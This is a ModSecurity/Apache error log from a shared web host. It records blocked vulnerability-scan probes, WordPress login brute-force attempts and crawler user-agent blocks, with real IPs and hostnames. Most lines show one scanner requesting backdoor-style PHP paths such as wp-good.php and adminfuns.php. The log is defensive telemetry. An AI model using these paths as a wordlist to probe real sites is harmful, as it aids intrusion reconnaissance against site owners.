[Tue May 26 20:07:56.990017 2026] [security2:error] [pid 113091:tid 113343] [client 4.205.23.164:8215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/wp-admin/user/index.php"] [unique_id "ahWwRKPxBGSmlFNOy6pozQAAAo4"]
[Tue May 26 20:07:57.528222 2026] [security2:error] [pid 112029:tid 112176] [client 4.205.23.164:8239] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/wp-conf.php"] [unique_id "ahWwRaFW0C-ajaCsyFdWRQAAARs"]
[Tue May 26 20:07:57.857601 2026] [security2:error] [pid 113091:tid 113174] [remote 111.229.141.137:54960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWwRaPxBGSmlFNOy6po3gACQVI"]
[Tue May 26 20:07:58.162128 2026] [security2:error] [pid 113091:tid 113223] [client 114.119.128.23:65513] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWwRqPxBGSmlFNOy6po8QAAAhY"], referer: https://www.glorodrc.com/index.php?route=product/product&product_id=107
[Tue May 26 20:07:58.292583 2026] [security2:error] [pid 113091:tid 113299] [client 4.205.23.164:8271] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/wp-content/themes/hideo/network.php"] [unique_id "ahWwRqPxBGSmlFNOy6po9QAAAmI"]
[Tue May 26 20:07:58.521248 2026] [security2:error] [pid 113091:tid 113282] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwRqPxBGSmlFNOy6po7AAAAlE"]
[Tue May 26 20:07:59.205198 2026] [security2:error] [pid 112029:tid 112167] [client 4.205.23.164:8240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/wp-login.php"] [unique_id "ahWwRqFW0C-ajaCsyFdWaQAAARI"]
[Tue May 26 20:08:00.185108 2026] [security2:error] [pid 112029:tid 112282] [client 4.205.23.164:8259] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/abc.php"] [unique_id "ahWwSKFW0C-ajaCsyFdWjQAAAYU"]
[Tue May 26 20:08:00.614702 2026] [autoindex:error] [pid 112029:tid 112254] [client 198.235.24.96:0] AH01276: Cannot serve directory /home2/debatqhn/finclass.africa/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 20:08:01.555488 2026] [security2:error] [pid 113091:tid 113237] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwSaPxBGSmlFNOy6ppOQAAAiQ"]
[Tue May 26 20:08:01.955847 2026] [security2:error] [pid 113091:tid 113236] [client 4.205.23.164:8313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/abcd.php"] [unique_id "ahWwSaPxBGSmlFNOy6ppPgAAAiM"]
[Tue May 26 20:08:03.309738 2026] [security2:error] [pid 112029:tid 112188] [client 51.195.244.202:43668] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "usteve.com"] [uri "/robots.txt"] [unique_id "ahWwS6FW0C-ajaCsyFdW8AAAASc"]
[Tue May 26 20:08:03.309893 2026] [security2:error] [pid 112029:tid 112188] [client 51.195.244.202:43668] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "usteve.com"] [uri "/robots.txt"] [unique_id "ahWwS6FW0C-ajaCsyFdW8AAAASc"]
[Tue May 26 20:08:03.520142 2026] [security2:error] [pid 112029:tid 112160] [client 4.205.23.164:8319] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/as.php"] [unique_id "ahWwS6FW0C-ajaCsyFdW9wAAAQs"]
[Tue May 26 20:08:03.667375 2026] [security2:error] [pid 112029:tid 112257] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwS6FW0C-ajaCsyFdW7gAAAWw"]
[Tue May 26 20:08:04.499617 2026] [security2:error] [pid 112029:tid 112198] [client 4.205.23.164:8309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/wp-trackback.php"] [unique_id "ahWwTKFW0C-ajaCsyFdXHAAAATE"]
[Tue May 26 20:08:04.731319 2026] [security2:error] [pid 113091:tid 113325] [client 54.39.89.170:63426] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "usteve.com"] [uri "/"] [unique_id "ahWwTKPxBGSmlFNOy6ppewAAAnw"]
[Tue May 26 20:08:04.731426 2026] [security2:error] [pid 113091:tid 113325] [client 54.39.89.170:63426] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "usteve.com"] [uri "/"] [unique_id "ahWwTKPxBGSmlFNOy6ppewAAAnw"]
[Tue May 26 20:08:05.362589 2026] [security2:error] [pid 113091:tid 113225] [client 4.205.23.164:8296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/about.php"] [unique_id "ahWwTaPxBGSmlFNOy6ppjQAAAhg"]
[Tue May 26 20:08:05.441084 2026] [security2:error] [pid 113091:tid 113275] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwTaPxBGSmlFNOy6pphgAAAko"]
[Tue May 26 20:08:05.727064 2026] [security2:error] [pid 113091:tid 113321] [client 4.205.23.164:8281] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/file.php"] [unique_id "ahWwTaPxBGSmlFNOy6ppmQAAAng"]
[Tue May 26 20:08:06.136661 2026] [security2:error] [pid 113091:tid 113242] [client 4.205.23.164:7790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/adminfuns.php"] [unique_id "ahWwTqPxBGSmlFNOy6pppwAAAik"]
[Tue May 26 20:08:06.559585 2026] [security2:error] [pid 112029:tid 112245] [client 4.205.23.164:8192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/wp-good.php"] [unique_id "ahWwTqFW0C-ajaCsyFdXTgAAAWA"]
[Tue May 26 20:08:06.666904 2026] [security2:error] [pid 112029:tid 112285] [client 192.178.4.100:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.canopykaapi.com"] [uri "/index.php"] [unique_id "ahWwTqFW0C-ajaCsyFdXQwAAAYg"]
[Tue May 26 20:08:07.738030 2026] [security2:error] [pid 113091:tid 113272] [client 4.205.23.164:8310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/xmlrpc.php"] [unique_id "ahWwT6PxBGSmlFNOy6ppyAAAAkc"]
[Tue May 26 20:08:08.170912 2026] [security2:error] [pid 112029:tid 112269] [client 4.205.23.164:8199] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/goods.php"] [unique_id "ahWwUKFW0C-ajaCsyFdXggAAAXg"]
[Tue May 26 20:08:08.372966 2026] [security2:error] [pid 113091:tid 113264] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwT6PxBGSmlFNOy6ppzwAAAj8"]
[Tue May 26 20:08:10.223061 2026] [security2:error] [pid 112029:tid 112247] [client 4.205.23.164:8306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/class-t.api.php"] [unique_id "ahWwUqFW0C-ajaCsyFdXqgAAAWI"]
[Tue May 26 20:08:10.927320 2026] [security2:error] [pid 113091:tid 113299] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwUqPxBGSmlFNOy6pqJQAAAmI"]
[Tue May 26 20:08:11.439720 2026] [security2:error] [pid 113091:tid 113100] [remote 54.38.29.86:39530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWwU6PxBGSmlFNOy6pqOgACigg"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:08:11.721028 2026] [security2:error] [pid 112029:tid 112238] [client 4.205.23.164:8274] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/sf.php"] [unique_id "ahWwU6FW0C-ajaCsyFdX1AAAAVk"]
[Tue May 26 20:08:12.592025 2026] [security2:error] [pid 113091:tid 113225] [client 4.205.23.164:8265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/kbfr.php"] [unique_id "ahWwVKPxBGSmlFNOy6pqXwAAAhg"]
[Tue May 26 20:08:13.358219 2026] [security2:error] [pid 113091:tid 113265] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwVKPxBGSmlFNOy6pqZAAAAkA"]
[Tue May 26 20:08:13.482076 2026] [security2:error] [pid 112029:tid 112237] [client 185.191.171.11:54682] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahWwVaFW0C-ajaCsyFdYBQAAAVg"]
[Tue May 26 20:08:13.482190 2026] [security2:error] [pid 112029:tid 112237] [client 185.191.171.11:54682] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahWwVaFW0C-ajaCsyFdYBQAAAVg"]
[Tue May 26 20:08:14.011405 2026] [security2:error] [pid 113091:tid 113236] [client 4.205.23.164:8236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/autoload_classmap.php"] [unique_id "ahWwVqPxBGSmlFNOy6pqgwAAAiM"]
[Tue May 26 20:08:15.038540 2026] [security2:error] [pid 112029:tid 112206] [client 4.205.23.164:8266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/chosen.php"] [unique_id "ahWwV6FW0C-ajaCsyFdYLgAAATk"]
[Tue May 26 20:08:15.270248 2026] [security2:error] [pid 112029:tid 112240] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwVqFW0C-ajaCsyFdYJgAAAVs"]
[Tue May 26 20:08:15.542156 2026] [security2:error] [pid 112029:tid 112217] [client 4.205.23.164:8256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/classwithtostring.php"] [unique_id "ahWwV6FW0C-ajaCsyFdYPAAAAUQ"]
[Tue May 26 20:08:16.535169 2026] [security2:error] [pid 112029:tid 112166] [client 4.205.23.164:8210] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/defaults.php"] [unique_id "ahWwWKFW0C-ajaCsyFdYVwAAARE"]
[Tue May 26 20:08:17.429697 2026] [security2:error] [pid 113091:tid 113332] [client 4.205.23.164:8225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/info.php"] [unique_id "ahWwWaPxBGSmlFNOy6pq5QAAAoM"]
[Tue May 26 20:08:17.701408 2026] [security2:error] [pid 113091:tid 113255] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwWaPxBGSmlFNOy6pq3gAAAjY"]
[Tue May 26 20:08:19.204461 2026] [security2:error] [pid 113091:tid 113335] [client 4.205.23.164:8817] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/wp-includes/Requests/src/Response/about.php"] [unique_id "ahWwW6PxBGSmlFNOy6prFgAAAoY"]